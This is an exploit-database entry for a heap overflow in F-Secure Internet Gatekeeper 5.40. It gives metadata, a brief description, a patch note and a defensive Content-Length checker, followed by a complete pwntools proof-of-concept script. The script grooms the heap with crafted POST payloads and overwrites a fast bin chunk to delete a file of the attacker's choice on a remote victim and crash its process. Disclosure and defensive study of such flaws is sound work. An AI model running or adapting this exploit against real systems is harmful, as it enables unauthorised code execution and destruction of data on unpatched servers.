Vendor: Internet Gatekeeper
By: Kevin Joensen
CVSS: 7.5 (HIGH)
Vulnerability type: Heap Overflow
CWE: 122
Product Name: Internet Gatekeeper
Affected Version From: 5.40
Affected Version To: 5.40
Patch Exists: YES
Related CWE: N/A
CPE: a:f-secure:internet_gatekeeper
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
Year: 2020

F-Secure Internet Gatekeeper 5.40 – Heap Overflow (PoC)

This exploit is a proof-of-concept for a heap overflow vulnerability in F-Secure Internet Gatekeeper 5.40. The vulnerability is triggered by sending a specially crafted POST request with a large Content-Length header. This causes a heap overflow, which can be used to overwrite a fast bin chunk and gain code execution. The exploit was discovered by Kevin Joensen and detailed in a blog post by Doyensec.

Mitigation:

F-Secure has released a patch for this vulnerability. Users should update to the latest version of F-Secure Internet Gatekeeper to protect against this vulnerability.
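As an added defensive illustration (not part of the Exploit-DB entry or of the PoC below), the following check parses a raw HTTP request head and flags a Content-Length that does not fit in 32 bits or exceeds a body-size policy. The 64 MiB policy limit is an assumed value, and the sample request is constructed from the header values the PoC sends.

```python
import re

# Assumed body-size policy for a proxy; not a value from the advisory.
MAX_BODY_BYTES = 64 * 1024 * 1024
UINT32_MAX = 0xFFFFFFFF

# Constructed sample: the request line and headers the PoC sends, plus a few body bytes.
SAMPLE_REQUEST = (
    b"POST / HTTP/1.1\n"
    b"Host: 192.168.0.122:9012\n"
    b"Content-Length: 21487483844\n"
    b"\n"
    b"A" * 12
)


def parse_headers(raw):
    """Split a raw request into (request_line, {lowercased-name: value}).

    Accepts bare '\\n' line endings as well as '\\r\\n', since the PoC uses the former.
    """
    head = raw.split(b"\n\n", 1)[0].split(b"\r\n\r\n", 1)[0]
    lines = head.replace(b"\r\n", b"\n").split(b"\n")
    request_line = lines[0].decode("latin-1")
    headers = {}
    for line in lines[1:]:
        if b":" not in line:
            continue  # malformed header line; ignored by this heuristic
        name, value = line.split(b":", 1)
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return request_line, headers


def check_content_length(raw, limit=MAX_BODY_BYTES):
    """Return a list of findings about the Content-Length header (empty = nothing suspicious)."""
    _request_line, headers = parse_headers(raw)
    findings = []
    value = headers.get("content-length")
    if value is None:
        return findings
    if not re.fullmatch(r"[0-9]+", value):
        findings.append("non-numeric Content-Length %r" % value)
        return findings
    n = int(value)
    if n > UINT32_MAX:
        # Report the 32-bit wrap so an analyst sees what a narrow integer parse would yield.
        findings.append("Content-Length %d does not fit in 32 bits (wraps to %d)" % (n, n & UINT32_MAX))
    if n > limit:
        findings.append("Content-Length %d exceeds policy limit %d" % (n, limit))
    return findings
```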
Source

Exploit-DB raw data:

# Title: F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)
# Date: 2020-01-30
# Author: Kevin Joensen
# Vendor: F-Secure
# Software: https://www.f-secure.com/en/business/downloads/internet-gatekeeper
# CVE: N/A
# Reference: https://blog.doyensec.com/2020/02/03/heap-exploit.html

from pwn import *
import time
import sys



def send_payload(payload, content_len=21487483844, nofun=False):
    r = remote(sys.argv[1], 9012)
    r.send("POST / HTTP/1.1\n")
    r.send("Host: 192.168.0.122:9012\n")
    r.send("Content-Length: {}\n".format(content_len))
    r.send("\n")
    r.send(payload)
    if not nofun:
        r.send("\n\n")
    return r


def trigger_exploit():
    print "Triggering exploit"
    payload = ""
    payload += "A" * 12             # Padding
    payload += p32(0x1d)            # Fast bin chunk overwrite
    payload += "A" * 488           # Padding
    payload += p32(0xdda00771)      # Address of payload
    payload += p32(0xdda00771+4)    # Junk
    r = send_payload(payload)



def massage_heap(filename):
    print "Trying to massage the heap....."
    for x in xrange(100):
        payload = ""
        payload += p32(0x0)             # Needed to bypass checks
        payload += p32(0x0)             # Needed to bypass checks
        payload += p32(0xdda0077d)      # Points to where the filename will be in memory
        payload += filename + "\x00"
        payload += "C"*(0x300-len(payload))
        r = send_payload(payload, content_len=0x80000, nofun=True)
        r.close()
        cut_conn = True
    print "Heap massage done"


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
        print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
        exit()
    massage_heap(sys.argv[2])
    time.sleep(1)
    trigger_exploit()
    print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])